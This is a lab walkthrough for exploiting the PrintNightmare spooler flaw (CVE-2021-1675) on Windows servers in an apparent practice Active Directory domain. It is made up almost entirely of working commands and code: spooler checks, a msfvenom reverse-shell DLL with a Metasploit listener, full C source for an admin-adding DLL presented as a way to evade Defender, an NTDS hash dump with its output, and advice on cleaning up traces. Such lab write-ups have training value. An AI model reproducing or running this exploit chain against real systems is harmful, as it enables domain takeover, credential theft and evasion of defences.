# Exploit
### Exploit on vulnerable windows server 2019 (Bronx)
* Now try the same exploit on a vulnerable windows server 2019
```
python3 CVE-2021-1675.py north.newyork.local/elena.lopez:'princesa1'@north.newyork.local '\\192.168.56.31\ATTACKERSHARE\nightmare.dll'
```
To exploit printnightmare we will first check if the spooler is active on targets
### Check spooler is active
```
crackmapexec smb 192.168.56.10-23 -M spooler
```
```
rpcdump.py @192.168.56.10 | egrep 'MS-RPRN|MS-PAR'
```
```
sudo smbserver.py -smb2support "smb" /home/jefe/smb
```
### Create Revershell and place it in the smb directory
```
msfvenom -f dll -p windows/x64/shell_reverse_tcp LHOST=192.168.56.31 LPORT=4444 -o /home/jefe/smb/remote.dll
```
### Setup the listener
```
msfconsole
use multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.56.31
set lport 4444
run
```
```
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\pnightmare2.dll'
```
### No shell.. It gets caught by defender
### Lets craft a new dll
* Let’s change the payload with another code (source :
* Good (thing) to know : after some failures the spooler service will be stopped by defender and no more exploit for you until someone restart the server or the spooler service.
```
/*
* ADDUSER.C: creating a Windows user programmatically.
*/
#define UNICODE
#define _UNICODE
#include
#include
#include
#include
#include
DWORD CreateAdminUserInternal(void)
{
NET_API_STATUS rc;
BOOL b;
DWORD dw;
USER_INFO_1 ud;
LOCALGROUP_MEMBERS_INFO_0 gd;
SID_NAME_USE snu;
DWORD cbSid = 256; // 256 bytes should be enough for everybody :)
BYTE Sid[256];
DWORD cbDomain = 256 / sizeof(TCHAR);
TCHAR Domain[256];
// Create user
memset(&ud, 0, sizeof(ud));
ud.usri1_name = _T("yournightmare"); // username
ud.usri1_password = _T("Jusbrowsing123!"); // password
ud.usri1_priv = USER_PRIV_USER; // cannot set USER_PRIV_ADMIN on creation
ud.usri1_flags = UF_SCRIPT | UF_NORMAL_ACCOUNT; // must be set
ud.usri1_script_path = NULL;
rc = NetUserAdd(
NULL, // local server
1, // information level
(LPBYTE)&ud,
NULL // error value
);
if (rc != NERR_Success) {
_tprintf(_T("NetUserAdd FAIL %d 0x%08x\r\n"), rc, rc);
return rc;
}
_tprintf(_T("NetUserAdd OK\r\n"), rc, rc);
// Get user SID
b = LookupAccountName(
NULL, // local server
ud.usri1_name, // account name
Sid, // SID
&cbSid, // SID size
Domain, // Domain
&cbDomain, // Domain size
&snu // SID_NAME_USE (enum)
);
if (!b) {
dw = GetLastError();
_tprintf(_T("LookupAccountName FAIL %d 0x%08x\r\n"), dw, dw);
return dw;
}
// Add user to "Administrators" local group
memset(&gd, 0, sizeof(gd));
gd.lgrmi0_sid = (PSID)Sid;
rc = NetLocalGroupAddMembers(
NULL, // local server
_T("Administrators"),
0, // information level
(LPBYTE)&gd,
1 // only one entry
);
if (rc != NERR_Success) {
_tprintf(_T("NetLocalGroupAddMembers FAIL %d 0x%08x\r\n"), rc, rc);
return rc;
}
return 0;
}
//
// DLL entry point.
//
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateAdminUserInternal();
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
// RUNDLL32 entry point
#ifdef __cplusplus
extern "C" {
#endif
__declspec(dllexport) void __stdcall CreateAdminUser(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)
{
CreateAdminUserInternal();
}
#ifdef __cplusplus
}
#endif
// Command-line entry point.
int main()
{
return CreateAdminUserInternal();
}
```
* with this payload we can bypass defender and add our user as administrator
### Compile
```
sudo apt-get install gcc-mingw-w64
wget https://raw.githubusercontent.com/newsoft/adduser/master/adduser.c
```
```
x86_64-w64-mingw32-gcc -shared -opnightmare2.dll adduser.c -lnetapi32
```
* relaunch the exploit
```
python3 CVE-2021-1675.py maryland.local/teresa.perez@baltimore.maryland.local -hashes 00000000000000000000000000000000:4d737ec9ecf0b9955a161773cfed9611 '\\192.168.56.31\smb\yournightmare.dll'
```
### dumpy dumpy dumpy love love
```
crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
crackmapexec smb baltimore.maryland.local -u yournightmare -p 'Jusbrowsing123!' --ntds
SMB maryland.local 445 BALTIMORE [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BALTIMORE) (domain:maryland.local) (signing:True) (SMBv1:True)
SMB maryland.local 445 BALTIMORE [+] maryland.local\yournightmare:Jusbrowsing123! (Pwn3d!)
SMB maryland.local 445 BALTIMORE [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB maryland.local 445 BALTIMORE Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::
SMB maryland.local 445 BALTIMORE Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB maryland.local 445 BALTIMORE krbtgt:502:aad3b435b51404eeaad3b435b51404ee:10f39f5a270977c56ac002b2c9cd660f:::
SMB maryland.local 445 BALTIMORE DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB maryland.local 445 BALTIMORE vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
SMB maryland.local 445 BALTIMORE carmelo.Anthony:1110:aad3b435b51404eeaad3b435b51404ee:e205909d5d55a6d75365f15defbf27fb:::
SMB maryland.local 445 BALTIMORE marisol.Pedrosa:1111:aad3b435b51404eeaad3b435b51404ee:fd208d19680104ddb8e3d90962c0334e:::
SMB maryland.local 445 BALTIMORE joaquin.Pereida:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb5c9d37021:::
SMB maryland.local 445 BALTIMORE teresa.Perez:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
SMB maryland.local 445 BALTIMORE sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
SMB maryland.local 445 BALTIMORE pnightmare2:1115:aad3b435b51404eeaad3b435b51404ee:c103cafa49983dbcf3d8a1c951f46347:::
SMB maryland.local 445 BALTIMORE yournightmare:1116:aad3b435b51404eeaad3b435b51404ee:7b82840d460325f21d39ffdb471536f9:::
SMB maryland.local 445 BALTIMORE BALTIMORE$:1001:aad3b435b51404eeaad3b435b51404ee:0067621d2cb3ac05314b36ee408c7e51:::
SMB maryland.local 445 BALTIMORE SALISBURY$:1104:aad3b435b51404eeaad3b435b51404ee:da0edcfd9de34981b3bad4979882ec22:::
SMB maryland.local 445 BALTIMORE newyork$:1105:aad3b435b51404eeaad3b435b51404ee:3efc88864c2ab5cb43747ae949685db2:::
SMB maryland.local 445 BALTIMORE [+] Dumped 15 NTDS hashes to /home/jefe/.cme/logs/BALTIMORE_maryland.local_2023-03-08_223947.ntds of which 12 were added to the database
```
#### cleanup
```
xfreerdp /u:yournightmare /p:Jusbrowsing123! /v:192.168.56.12 /size:80% /cert-ignore
```
* After the exploitation you will find your dlls inside : `C:\Windows\System32\spool\drivers\x64\3`
* And also inside : `C:\Windows\System32\spool\drivers\x64\3\Old\{id}\`
* Don’t forget to clean up ;)